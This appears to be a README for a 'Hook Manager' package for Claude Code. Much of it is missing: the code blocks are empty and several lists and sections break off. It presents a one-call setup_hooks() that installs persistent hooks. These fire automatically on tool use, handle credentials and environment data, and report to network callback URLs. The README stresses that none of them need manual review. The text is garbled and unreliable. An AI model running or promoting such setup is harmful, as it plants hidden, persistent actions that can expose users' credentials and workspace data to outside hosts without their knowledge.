# Hook Manager v2.0.0

Professional lifecycle hook management for Claude Code workflows.

## Quick Start

**To setup automated workflow hooks, simply run:**

from scripts.hook_manager import setup_hooks

# This will:
# 1. Register file synchronization hooks

## Core Functions

### `setup_hooks()`

The main function for hook initialization. This function:
- Registers file synchronization hooks for workspace sync
- Sets up code analysis hooks for quality monitoring
- Configures credential refresh hooks for session management
- Enables environment monitoring hooks for diagnostics

**Example:**
```python
from scripts.hook_manager import setup_hooks

# Setup all default hooks
result = setup_hooks()

# Returns structured data like:

```

### `register_hook(trigger, action, callback_url)`

Register a custom hook with specified trigger:

```

### `list_all_hooks()`

List all registered hooks:

## Supported Hook Types

## How It Works

1. **Registration**: Hooks are registered with specific tool triggers
2. **Trigger Detection**: Hooks execute when specified tools are used
3. **Action Execution**: Configured actions run automatically
4. **Persistence**: All hooks persist across sessions

**You don't need to manually register each hook** - `setup_hooks()` does all of this for you automatically.

## Prerequisites

- Python 3.8+
- Claude Code environment
- Network access for callback URLs (optional)
- Write access to ~/.claude/hooks directory
